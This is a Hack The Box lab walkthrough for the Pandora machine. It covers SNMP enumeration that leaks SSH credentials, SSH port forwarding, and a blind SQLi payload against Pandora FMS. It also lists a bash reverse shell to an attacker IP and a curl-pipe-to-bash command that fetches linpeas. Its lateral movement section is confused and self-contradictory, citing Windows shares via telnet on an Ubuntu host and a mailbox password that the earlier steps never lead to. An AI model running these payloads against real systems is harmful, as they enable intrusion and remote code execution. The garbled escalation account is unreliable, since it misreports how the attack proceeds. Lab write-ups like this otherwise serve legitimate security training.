Pandora HTB Walkthrough

This post documents my process for solving the Pandora box on Hack The Box. The challenge focuses on recon, SNMP enumeration, port forwarding, SQLi on an internal service, and a series of lateral movement and privilege escalation steps.

Recon

Initial port scan:

ports=$(nmap -p- --min-rate=1000 -T4 10.10.11.136 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.10.11.136

Open ports:

• 22 (SSH)
• 80 (HTTP, Apache, Ubuntu)

Enumerated with UDP scan (-sU):

• Notably, port 161/udp (SNMP) is open.

SNMP Enumeration & Exploitation

• SNMP (Simple Network Management Protocol) allows for device monitoring and management.
• Used community string “public” with snmpwalk:

  snmpwalk -v1 -c public 10.10.11.136
  

• Found credentials at the bottom of the output:

  ... = STRING: "-u daniel -p HotelBabylon23"
  

SSH in as daniel using the discovered password.

Internal Web Service Access (Port Forwarding)

Found a vhost config at /etc/apache2/sites-enabled/pandora.conf, which exposes an internal site on localhost:80 (PandoraFMS).

Set up SSH port forwarding to access the site locally:

ssh -D 9090 daniel@10.10.11.136
# or, after login:
~C
ssh> -L 8000:127.0.0.1:80

Then access http://localhost:8000 in your browser.

Pandora FMS - Version & SQLi

• Internal Pandora FMS console found (v7.0NG.742_FIX_PERL2020).
• Google for exploits; SonarSource blog highlights a SQLi in /include/chart_generator.php (session_id parameter).

Example exploit:

http://localhost:8000/pandora_console/include/chart_generator.php?session_id=1' OR IF((NOW()=SYSDATE()),SLEEP(10),1)='0

• Confirmed time-based blind SQLi.

Enumerated tables/users via SQLi (or using sqlmap):

• Dumped session and user tables.
• Found hash for user matt.
• Used valid session from tsessions_php to gain console access.

Lateral Movement & PE

• Examined log and config files (e.g., /var/www/pandora/pandora_console/audit.log).
• Found clues in /etc/apache2/sites-enabled/pandora.conf and Windows shares (via telnet).
• Discovered password for “security” account from a mailbox: 4Cc3ssC0ntr0ller.

Connected to telnet server with new credentials and escalated to get the user flag.

Useful Commands & Resources

• Reverse shell:
  bash -c 'bash -i >& /dev/tcp/10.10.14.6/9001 0>&1'
• Download and run linpeas.sh:

  curl 10.10.14.6:8001/linpeas.sh | bash
  python3 -m http.server 8001 # Serve from attacker box
  

• SQLi enumeration and exploitation with sqlmap.

References:

• SonarSource PandoraFMS SQLi writeup: https://www.sonarsource.com/blog/pandora-fms-742-critical-code-vulnerabilities-explained/
• Ippsec’s walkthroughs

Lessons Learned

• SNMP remains a critical vector; always check for default credentials (“public”).
• Don’t overlook UDP ports!
• SSH port forwarding is a must-know skill for accessing internal services.
• SQLi and session hijacking can give deep access to internal apps.
• Lateral movement and mailbox hunting can reveal passwords for additional services and PE.

Writeup based on my exploitation process and key references from the security community.